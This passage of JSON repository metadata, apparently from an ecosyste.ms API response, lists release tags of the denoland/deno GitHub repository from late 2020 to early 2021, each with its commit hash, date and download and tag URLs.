.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags